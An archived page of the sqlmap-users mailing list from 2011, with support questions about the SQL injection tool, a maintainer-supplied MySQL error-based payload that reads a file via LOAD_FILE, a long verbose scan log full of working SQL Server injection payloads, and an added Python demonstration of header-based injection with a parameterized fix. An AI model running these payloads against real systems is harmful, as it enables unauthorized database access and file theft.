sqlmap-users Mailing List for sqlmap (Page 105)
Brought to you by: inquisb
From: Johnny V. <Joh...@zo...> - 2011-02-12 00:27:34

Here is a sample of output I receive when I request "--current-user": ?~t|r8p?@?~?xx?n?zt

I am using version 0.9-dev. Boolean based blind is the type of injection that was found.

On Feb 11, 2011, at 5:41 PM, Miroslav Stampar wrote:
> hi Johnny.
>
> it's not normal behavior :)
>
> you haven't told which version you are using?
>
> kr
>
> On Fri, Feb 11, 2011 at 9:42 PM, Johnny Venter <Joh...@zo...> wrote:
>> Whenever I try to enumerate information from a vulnerable web app (with SQL 2008 back-end), the information is garbled/unreadable.
>>
>> I am using the SQLi blind method. Is there something I can do to convert the returned data or is this normal?
>>
>> Thanks, J
>>
>> ------------------------------------------------------------------------------
>> The ultimate all-in-one performance toolkit: Intel(R) Parallel Studio XE:
>> Pinpoint memory and threading errors before they happen.
>> Find and fix more than 250 security defects in the development cycle.
>> Locate bottlenecks in serial and parallel code that limit performance.
>> http://p.sf.net/sfu/intel-dev2devfeb
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> Alternate: miroslav.stampar (at) mail.ru
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-02-11 23:14:23

hi Svyatoslav.

we got a little carried away. please update to the latest revision (r3306) to have it implemented. please report if you notice any problems.

kr

p.s. if you want to test it, it's a must to use --referer to set it in the first place:

python sqlmap.py -u "http://www.site.com/page" --flush-session --referer="www.site2.com"

p.s. if you have other (GET) parameters you can force testing of only the Referer header by using the option -p referer

On Fri, Feb 11, 2011 at 11:39 PM, Miroslav Stampar <mir...@gm...> wrote:
> hi Svyatoslav.
>
> we'll do it in the next few days.
>
> kr
>
> On Fri, Feb 11, 2011 at 8:16 PM, Svyatoslav Lisin <se...@3d...> wrote:
>> Hello friends.
>>
>> Please, add an ability to test the REFERER header, as it is not affected by MAGIC_QUOTES. Currently only user-agent is being tested.
>>
>> Best regards,
>> Svjatoslav Lisin

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-02-11 22:41:11

hi Johnny.

it's not normal behavior :)

you haven't told which version you are using?

kr

On Fri, Feb 11, 2011 at 9:42 PM, Johnny Venter <Joh...@zo...> wrote:
> Whenever I try to enumerate information from a vulnerable web app (with SQL 2008 back-end), the information is garbled/unreadable.
>
> I am using the SQLi blind method. Is there something I can do to convert the returned data or is this normal?
>
> Thanks, J

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-02-11 22:39:34

hi Svyatoslav.

we'll do it in the next few days.

kr

On Fri, Feb 11, 2011 at 8:16 PM, Svyatoslav Lisin <se...@3d...> wrote:
> Hello friends.
>
> Please, add an ability to test the REFERER header, as it is not affected by MAGIC_QUOTES. Currently only user-agent is being tested.
>
> Best regards,
> Svjatoslav Lisin

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Miroslav S. <mir...@gm...> - 2011-02-11 22:34:31

hi Jarred.

you haven't stated which DBMS you are dealing with. probably MySQL?

if it's MySQL, I think that this line is not the one affected. you won't be able to use stacked queries for MySQL/PHP for sure, while also you won't be able to use an INSERT statement to dump into a file. also, for sure, you won't be able to "modify" existing files.

kr

p.s. to read the first 50 hex chars from C:\test.txt using that INSERT you described:

http://192.168.117.129/test_environment/mysql/get_int.php?isdn=1&user=3&user2=2' AND (SELECT 9822 FROM(SELECT COUNT(*),CONCAT((SELECT MID(HEX(LOAD_FILE('c:/test.txt')),1,50)),FLOOR(RAND(0)*2))x FROM library GROUP BY x)a) AND 'bla'='bla

On Fri, Feb 11, 2011 at 6:38 PM, <etc...@gm...> wrote:
> Hello!!
>
> My colleague and I have a problem for university; the teacher says that we need to upload or modify an existing file and execute the phpinfo(); function. We are looking at the PHP code, and we think that the SQL injection is in this code:
>
> $sqlp = ", ($isdn, '$user2' )";
> $sql = "INSERT DELAYED INTO library (isdn, user) VALUES ($isdn, '$user')$sqlp";
>
> All GET and POST parameters in this PHP code are filtered with the escapeshellcmd function, but not the user2 parameter, because its value comes from HTTP_X_FORWARDED_FOR. I know that I can modify the HTTP_X_FORWARDED_FOR header and inject SQL code, but I don't know how to save a file, maybe with UNION ... INTO OUTFILE? I tried, but it did not work (syntax error).
>
> Another piece of information about the problem is that the DB user is root.
>
> Thanks!
>
> --
> Jarred

--
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
Alternate: miroslav.stampar (at) mail.ru
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Johnny V. <Joh...@zo...> - 2011-02-11 20:43:02

Whenever I try to enumerate information from a vulnerable web app (with SQL 2008 back-end), the information is garbled/unreadable.

I am using the SQLi blind method. Is there something I can do to convert the returned data or is this normal?

Thanks, J
From: Johnny V. <Joh...@zo...> - 2011-02-11 20:38:57

Whenever I try to enumerate information from a vulnerable web app (with SQL 2008 back-end), the information is garbled/unreadable.

I am using the SQLi blind method. Is there something I can do to convert the returned data or is this normal?

Thanks, J
From: Svyatoslav L. <se...@3d...> - 2011-02-11 19:43:05

Hello friends.

Please, add an ability to test the REFERER header, as it is not affected by MAGIC_QUOTES. Currently only user-agent is being tested.

Best regards,
Svjatoslav Lisin
From: <etc...@gm...> - 2011-02-11 17:38:32

Hello!!

My colleague and I have a problem for university; the teacher says that we need to upload or modify an existing file and execute the phpinfo(); function. We are looking at the PHP code, and we think that the SQL injection is in this code:

$sqlp = ", ($isdn, '$user2' )";
$sql = "INSERT DELAYED INTO library (isdn, user) VALUES ($isdn, '$user')$sqlp";

All GET and POST parameters in this PHP code are filtered with the escapeshellcmd function, but not the user2 parameter, because its value comes from HTTP_X_FORWARDED_FOR. I know that I can modify the HTTP_X_FORWARDED_FOR header and inject SQL code, but I don't know how to save a file, maybe with UNION ... INTO OUTFILE? I tried, but it did not work (syntax error).

Another piece of information about the problem is that the DB user is root.

Thanks!

--
Jarred
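Svyatoslav's request and Jarred's question above come down to the same point: a filter applied to GET/POST values (magic_quotes_gpc, or the escapeshellcmd call in Jarred's code) never touches request headers such as Referer or X-Forwarded-For, so a query assembled by string concatenation stays injectable through them, and the fix is to bind every value rather than to filter more sources. The following is an added example, not code from this thread or from sqlmap; it models Jarred's INSERT against an in-memory SQLite table with a constructed request and a quote-doubling stand-in for the filter, and shows the parameterized version beside it.

```python
import sqlite3

# Constructed request for the demo: the form fields are what the app's
# filter sees; the X-Forwarded-For header is attacker-controlled and,
# like Referer, never passes through a magic_quotes-style filter.
REQUEST = {
    "GET": {"isdn": "1", "user": "O'Brien"},
    "HEADERS": {"X-Forwarded-For": "203.0.113.7'), (0, 'injected-row"},
}


def escape_param(value):
    """Stand-in for the escaping magic_quotes_gpc applied to request
    parameters. SQLite escapes a quote by doubling it, so that is used here."""
    return value.replace("'", "''")


def filtered_params(request):
    """Only GET/POST values pass through the filter, as with magic_quotes_gpc."""
    return {k: escape_param(v) for k, v in request["GET"].items()}


def new_db():
    """Fresh in-memory table shaped like the thread's 'library' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE library (isdn INTEGER, user TEXT)")
    return conn


def insert_by_concatenation(request):
    """The thread's pattern: $user from a filtered parameter, $user2 from the
    raw X-Forwarded-For header, both concatenated into one INSERT
    (plain INSERT here; INSERT DELAYED is MySQL-only)."""
    conn = new_db()
    p = filtered_params(request)
    user2 = request["HEADERS"]["X-Forwarded-For"]  # never filtered
    isdn = int(p["isdn"])
    sqlp = f", ({isdn}, '{user2}')"
    sql = f"INSERT INTO library (isdn, user) VALUES ({isdn}, '{p['user']}'){sqlp}"
    conn.execute(sql)
    return [row[0] for row in conn.execute("SELECT user FROM library ORDER BY rowid")]


def insert_parameterized(request):
    """Hardened form: every value, whatever its source, is bound as a
    parameter, so header text is stored as data instead of parsed as SQL."""
    conn = new_db()
    isdn = int(request["GET"]["isdn"])
    user = request["GET"]["user"]
    user2 = request["HEADERS"]["X-Forwarded-For"]
    conn.execute(
        "INSERT INTO library (isdn, user) VALUES (?, ?), (?, ?)",
        (isdn, user, isdn, user2),
    )
    return [row[0] for row in conn.execute("SELECT user FROM library ORDER BY rowid")]


if __name__ == "__main__":
    # The concatenated query stores three rows (the header smuggled one in);
    # the parameterized one stores exactly the two the application intended.
    print(insert_by_concatenation(REQUEST))
    print(insert_parameterized(REQUEST))
```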
From: David G. <sk...@gm...> - 2011-02-09 12:47:18

Tested, and it is ok now... Thank u.. =)

On Wed, Feb 9, 2011 at 10:40 AM, Miroslav Stampar <mir...@gm...> wrote:
> hi David.
>
> please update to the latest commit (r3289 - committed this moment) and retry.
>
> kr
>
> On Wed, Feb 9, 2011 at 1:24 PM, David Guimaraes <sk...@gm...> wrote:
> > There is an error with SQL Server queries.. probably in queries.xml?? The problem is these two ORDER BY in the query sent to the server (--db, --tables, etc.). I checked it after upgrading to the latest svn revision.
> >
> > 20111' AND 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh
> > [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'ORDER'.
> >
> > Log:
> >
> > #./sqlmap.py --cookie "ASPSESSIONIDCABDBSQC=..." -u "http://www.vuln.com/path/default.asp?p=20111" -p p -v 3 --dbs --flush --batch | tee saida.txt
> >
> > sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> > http://sqlmap.sourceforge.net
> >
> > [*] starting at: 09:55:04
> >
> > [09:55:04] [DEBUG] cleaning up configuration parameters
> > [09:55:04] [DEBUG] setting the HTTP timeout
> > [09:55:04] [DEBUG] setting the HTTP Cookie header
> > [09:55:04] [DEBUG] setting the HTTP method to GET
> > [09:55:04] [DEBUG] creating HTTP requests opener object
> > [09:55:04] [WARNING] the testable parameter 'p' you provided is not into the Cookie
> > [09:55:04] [INFO] using '/path/sqlmap-dev/output/www.vuln.com/session' as session file
> > [09:55:04] [INFO] flushing session file
> > [09:55:04] [INFO] testing connection to the target url
> > [09:55:05] [INFO] testing if the url is stable, wait a few seconds
> > [09:55:06] [INFO] url is stable
> > [09:55:06] [PAYLOAD] 20111'(''')"(''
> > [09:55:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:07] [INFO] heuristic test shows that GET parameter 'p' might be injectable (possible DBMS: Microsoft SQL Server)
> > [09:55:07] [INFO] testing sql injection on GET parameter 'p'
> > [09:55:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> > [09:55:07] [PAYLOAD] 20111) AND 4197=5111 AND (1965=1965
> > [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952
> > [09:55:08] [PAYLOAD] 20111) AND 4255=4255 AND (6152=6152
> > [09:55:08] [PAYLOAD] 20111 AND 3013=569
> > [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952
> > [09:55:08] [PAYLOAD] 20111 AND 4255=4255
> > [09:55:09] [PAYLOAD] 20111') AND 513=8635 AND ('kiwS'='kiwS
> > [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:09] [PAYLOAD] 20111') AND 4255=4255 AND ('ofle'='ofle
> > [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:09] [PAYLOAD] 20111' AND 8628=4076 AND 'Jbgn'='Jbgn
> > [09:55:10] [DEBUG] setting match ratio for current parameter to 0.952
> > [09:55:10] [PAYLOAD] 20111' AND 4255=4255 AND 'obQa'='obQa
> > [09:55:10] [PAYLOAD] 20111' AND 9514=9437 AND 'ZUZG'='ZUZG
> > [09:55:11] [INFO] GET parameter 'p' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
> > [09:55:11] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)' because the payload for boolean-based blind has already been identified
> > [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause' because the payload for boolean-based blind has already been identified
> > [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)' because the payload for boolean-based blind has already been identified
> > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
> > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
> > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified
> > [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)' because the payload for boolean-based blind has already been identified
> > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
> > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the payload for boolean-based blind has already been identified
> > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified
> > [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
> > [09:55:11] [PAYLOAD] 20111' AND 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl
> > [09:55:11] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:11] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
> > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
> > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
> > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
> > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace' because the payload for error-based has already been identified
> > [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the payload for error-based has already been identified
> > [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
> > [09:55:11] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos
> > [09:55:17] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos
> > [09:55:22] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase stacked queries' injectable
> > [09:55:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
> > [09:55:22] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
> > [09:55:27] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
> > [09:55:33] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase time-based blind' injectable
> > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT - original value)' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - GROUP BY and ORDER BY clauses' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked conditional-error blind queries' because the payload for boolean-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter replace' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle error-based - Parameter replace' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Firebird error-based - Parameter replace' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle error-based - GROUP BY and ORDER BY clauses' because the payload for error-based has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy query)' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query)' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' because the payload for stacked queries has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query - comment)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 OR time-based blind' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'Firebird OR time-based blind (heavy query)' because the payload for AND/OR time-based blind has already been identified
> > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 10 columns' because the back-end DBMS identified is Microsoft SQL Server
> > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 11 to 20 columns' because the level is higher than the provided
> > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 30 columns' because the level is higher than the provided
> > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 31 to 40 columns' because the level is higher than the provided
> > [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 50 columns' because the level is higher than the provided
> > [09:55:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> > [09:55:33] [PAYLOAD] 20111' UNION ALL SELECT NULL-- AND 'vrjZ'='vrjZ
> > [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL-- AND 'GZNB'='GZNB
> > [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL-- AND 'dLhE'='dLhE
> > [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'XeTw'='XeTw
> > [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'trjE'='trjE
> > [09:55:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:36] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'rjRE'='rjRE
> > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'vmHq'='vmHq
> > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ZBcW'='ZBcW
> > [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'qhhM'='qhhM
> > [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'OaNn'='OaNn
> > [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:38] [INFO] target url appears to be UNION injectable with 3 columns
> > [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(100)+CHAR(102)+CHAR(99)+CHAR(99) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND 'VYhx'='VYhx
> > [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(102)+CHAR(86)+CHAR(76)+CHAR(122) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'TyzA'='TyzA
> > [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(116)+CHAR(101)+CHAR(83)+CHAR(98) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND 'bKpM'='bKpM
> > [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> > [09:55:40] [PAYLOAD] -8546' UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(76)+CHAR(119)+CHAR(88)+CHAR(66) AS NVARCHAR(4000)), CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'HwBz'='HwBz
> > [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
